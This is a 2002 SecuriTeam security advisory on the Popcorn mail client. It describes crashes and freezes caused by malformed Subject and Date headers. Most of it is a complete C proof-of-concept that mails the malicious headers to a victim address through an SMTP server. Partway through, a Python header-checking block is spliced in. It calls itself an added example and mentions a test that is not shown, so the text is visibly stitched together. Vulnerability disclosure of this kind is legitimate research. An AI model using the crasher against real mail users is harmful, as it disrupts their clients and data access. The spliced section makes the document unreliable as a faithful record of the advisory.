[NT] Popcorn Security Vulnerabilities
From: support@securiteam.com  Date: 07/12/02
From: support@securiteam.com To: list@securiteam.com Date: Fri, 12 Jul 2002 20:29:32 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Popcorn Security Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.ultrafunk.com/products/popcorn/> Popcorn is a freeware
ultra-lightweight POP3/SMTP e-mail client. Malformed message headers allow
remote attackers to cause a denial of service against the client.
DETAILS
Vulnerable systems:
* Popcorn version 1.20 and prior
Process freeze and resource consumption
If an attacker sends a mail with the following subject:
Subject: \t\t
the client will try to read the mail but fail to parse this subject, so it
becomes stuck in the e-mail download process, and that process cannot be
terminated.
Buffer overflow in the Subject field
The client crashes whenever the user reads an e-mail with a subject such as:
Subject: (at least 490 'A's)
Improper handling of the Date field in received mails
This is an example of how Popcorn reformats a bare numeric Date field:
Date: 1 = 01.01.2000 00:00
Date: 11 = 11.01.2000 00:00
Date: 111 = 20.04.2000 00:00
Date: 1111 = 15.01.2003 00:00
Date: 11111 = 02.06.2030 00:00
Date: 111111 = 02.01.2032 11:03
Date: 1111111 = Crash!
Therefore, an attacker can crash the Popcorn client by sending it an e-mail
whose Date field contains a year greater than 2037 or, as shown above, the
value 1111111.
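The three header conditions above, as a header check that a mail gateway or filter could run before a message reaches a Popcorn client. This is an added example, not code from the advisory or from Popcorn; the popcorn_date() model of the bare-number Date handling is an assumption inferred from the advisory's table (the 2037 limit matches the range of a 32-bit time_t), not something the advisory states.

```python
from datetime import datetime, timedelta
from email.utils import parsedate_to_datetime

EPOCH_2000 = datetime(2000, 1, 1)
MAX_SAFE_YEAR = 2037      # advisory: a Date year above 2037 crashes the client
SUBJECT_CRASH_LEN = 490   # advisory: a Subject of at least 490 'A's crashes it


def popcorn_date(n):
    """Model of Popcorn's bare-integer Date handling (assumption inferred from
    the advisory's table, not stated there): day n counts from 01.01.2000 as
    day 1, is converted to seconds, and that value is truncated to 32 bits."""
    seconds = ((n - 1) * 86400) & 0xFFFFFFFF
    return EPOCH_2000 + timedelta(seconds=seconds)


def parse_headers(raw):
    """Raw header parse; no normalisation, so a whitespace-only value survives."""
    headers = []
    for line in raw.split("\n"):
        line = line.rstrip("\r")
        if line == "":
            break                                   # end of the header block
        if line[:1] in (" ", "\t") and headers:
            headers[-1][1] += line                  # folded continuation line
            continue
        name, _, value = line.partition(":")
        headers.append([name.strip().lower(), value[1:] if value[:1] == " " else value])
    return dict(headers)


def check_headers(raw):
    """Return findings for the three header conditions the advisory describes."""
    h, findings = parse_headers(raw), []
    subject = h.get("subject", "")
    if subject and subject.strip(" \t") == "":      # advisory's case: "\t\t"
        findings.append("whitespace-only Subject (download freeze)")
    if len(subject) >= SUBJECT_CRASH_LEN:
        findings.append("Subject of %d chars (buffer overflow)" % len(subject))
    date, year = h.get("date", "").strip(), None
    if date.isdigit():
        year = popcorn_date(int(date)).year         # bare-number form, e.g. 1111111
    elif date:
        try:
            year = parsedate_to_datetime(date).year
        except (TypeError, ValueError):
            pass                                    # unparsable date: not our case
    if year is not None and year > MAX_SAFE_YEAR:
        findings.append("Date year %d beyond 2037 (client crash)" % year)
    return findings
```

Sample headers in the test are constructed; the 2099 date is the alternative the PoC's own comment mentions.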
Exploit:
sock_err.h
/* Maps the last Winsock error to a message, prints it and exits when err < 0 */
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

void sock_err(int err) {
    char *error;
    if(err < 0) {
        switch(WSAGetLastError()) {
            case 10004: error = "Interrupted system call"; break;
            case 10009: error = "Bad file number"; break;
            case 10013: error = "Permission denied"; break;
            case 10014: error = "Bad address"; break;
            case 10022: error = "Invalid argument (not bind)"; break;
            case 10024: error = "Too many open files"; break;
            case 10035: error = "Operation would block"; break;
            case 10036: error = "Operation now in progress"; break;
            case 10037: error = "Operation already in progress"; break;
            case 10038: error = "Socket operation on non-socket"; break;
            case 10039: error = "Destination address required"; break;
            case 10040: error = "Message too long"; break;
            case 10041: error = "Protocol wrong type for socket"; break;
            case 10042: error = "Bad protocol option"; break;
            case 10043: error = "Protocol not supported"; break;
            case 10044: error = "Socket type not supported"; break;
            case 10045: error = "Operation not supported on socket"; break;
            case 10046: error = "Protocol family not supported"; break;
            case 10047: error = "Address family not supported by protocol family"; break;
            case 10048: error = "Address already in use"; break;
            case 10049: error = "Can't assign requested address"; break;
            case 10050: error = "Network is down"; break;
            case 10051: error = "Network is unreachable"; break;
            case 10052: error = "Net dropped connection or reset"; break;
            case 10053: error = "Software caused connection abort"; break;
            case 10054: error = "Connection reset by peer"; break;
            case 10055: error = "No buffer space available"; break;
            case 10056: error = "Socket is already connected"; break;
            case 10057: error = "Socket is not connected"; break;
            case 10058: error = "Can't send after socket shutdown"; break;
            case 10059: error = "Too many references, can't splice"; break;
            case 10060: error = "Connection timed out"; break;
            case 10061: error = "Connection refused"; break;
            case 10062: error = "Too many levels of symbolic links"; break;
            case 10063: error = "File name too long"; break;
            case 10064: error = "Host is down"; break;
            case 10065: error = "No Route to Host"; break;
            case 10066: error = "Directory not empty"; break;
            case 10067: error = "Too many processes"; break;
            case 10068: error = "Too many users"; break;
            case 10069: error = "Disc Quota Exceeded"; break;
            case 10070: error = "Stale NFS file handle"; break;
            case 10091: error = "Network SubSystem is unavailable"; break;
            case 10092: error = "WINSOCK DLL Version out of range"; break;
            case 10093: error = "Successful WSASTARTUP not yet performed"; break;
            case 10071: error = "Too many levels of remote in path"; break;
            case 11001: error = "Host not found"; break;
            case 11002: error = "Non-Authoritative Host not found"; break;
            case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
            case 11004: error = "Valid name, no data record of requested type"; break;
            default:    error = "Unknown error"; break;
        }
        printf("\nError: %s\n", error);
        exit(1);
    }
}
popcorn.c
/*
  Popcorn mail client crasher proof-of-concept
  (all versions, because the program is no longer supported)
  by Auriemma Luigi (e-mail: bugtest@sitoverde.com)
  Windows version
  With this little proof-of-concept an attacker can exploit some bugs
  of the Popcorn client.
  The arguments to pass to the utility are the From field, the To field,
  the SMTP server to use and the number of the attack.
  Linux version: run the exe with Wine (http://www.winehq.com)
*/
#include <stdio.h>
#include <stdlib.h>     /* exit(), atoi() */
#include <winsock.h>    /* link against the Winsock library (wsock32) */
#include <string.h>
#include "sock_err.h"

#define MSG1 "Subject: \t\t"
#define MSG2 "Subject: Hello, how are you? I'm going to crash you..."
/* I have inserted a long string so the user can't see the 'A's after it */
#define MSG3 "Date: 1111111"
/* or for example, "Date: Tue, 01 Jul 2099 01:31:30 +0200" */
#define MSG2CHZ 'A'
#define BUFFSIZE 506
/* 490 for exploit 2 + "Subject: " + CLOSEDATA = 506 */
#define TMPSIZE 192
/* for the received answers and for the SMTP commands */
#define OK1 "220" /* HELO */
#define OK2 "250" /* OK */
#define OK3 "354" /* DATA */
#define OK4 "221" /* QUIT */
#define HELO "HELO x\r\n"
#define DATA "DATA\r\n"
#define CLOSEDATA "\r\n\r\n.\r\n"
#define QUIT "QUIT\r\n"

void smtp_send(const char *buff, const char *ok);

char tmpbuff[TMPSIZE];
int shandle,
    err;

int main(int argc, char *argv[]) {
    WSADATA wsadata;
    struct sockaddr_in peer;
    struct hostent *hp;
    char buff[BUFFSIZE + 1];    /* +1 leaves room for the terminating NUL */

    setbuf(stdout, NULL);
    printf("\nPopcorn mail client crasher\n");
    if(argc < 5) {
        printf("\nUsage: %s <from@> <to@> <SMTP_server> <attack>\n\n"
               "Attack:\n"
               "1 - Process freeze = Subject: \\t\\t\n"
               "2 - Buffer overflow = Subject: 490(A)\n"
               "3 - Date crash = Date: 1111111\n",
               argv[0]);
        exit(1);
    }
    memset(buff, 0x00, sizeof(buff));
    memset(tmpbuff, 0x00, TMPSIZE);
    memset(&peer, 0x00, sizeof(peer));

    switch(atoi(argv[4])) {
        case 1: sprintf(buff, "%s%s", MSG1, CLOSEDATA); break;
        case 2:
            /* fill the subject line with 'A's, put the readable text at the
               start and then terminate the DATA section */
            memset(buff, MSG2CHZ, BUFFSIZE - strlen(CLOSEDATA));
            memcpy(buff, MSG2, strlen(MSG2));
            strcat(buff, CLOSEDATA);
            break;
        case 3: sprintf(buff, "%s%s", MSG3, CLOSEDATA); break;
        default:
            printf("\nError: Wrong type of attack\n");
            exit(1);
    }

    WSAStartup(MAKEWORD(2,0), &wsadata);
    if(inet_addr(argv[3]) == INADDR_NONE) {
        hp = gethostbyname(argv[3]);
        if(hp == 0) sock_err(-1);
        else peer.sin_addr = *((struct in_addr *)hp->h_addr);
    }
    else peer.sin_addr.s_addr = inet_addr(argv[3]);
    peer.sin_port = htons(IPPORT_SMTP);
    peer.sin_family = AF_INET;

    shandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sock_err(shandle);
    err = connect(shandle, (struct sockaddr *)&peer, sizeof(peer));
    sock_err(err);

    smtp_send("", OK1);                 /* read the server greeting */
    smtp_send(HELO, OK2);
    snprintf(tmpbuff, TMPSIZE, "MAIL FROM: <%s>\r\n", argv[1]);
    smtp_send(tmpbuff, OK2);
    snprintf(tmpbuff, TMPSIZE, "RCPT TO: <%s>\r\n", argv[2]);
    smtp_send(tmpbuff, OK2);
    smtp_send(DATA, OK3);
    smtp_send(buff, OK2);
    smtp_send(QUIT, OK4);
    printf("Mail sent successfully!\n");
    return(0);
}

/* send one command, read the reply and check that it carries the expected code */
void smtp_send(const char *buff, const char *ok) {
    err = send(shandle, buff, strlen(buff), 0);
    sock_err(err);
    err = recv(shandle, tmpbuff, TMPSIZE - 1, 0);
    sock_err(err);
    tmpbuff[err] = 0;                   /* NUL-terminate the reply before strstr */
    if(!strstr(tmpbuff, ok)) {
        printf("\nError: %s\n", tmpbuff);
        exit(1);
    }
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:bugtest@sitoverde.com>
Auriemma Luigi.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.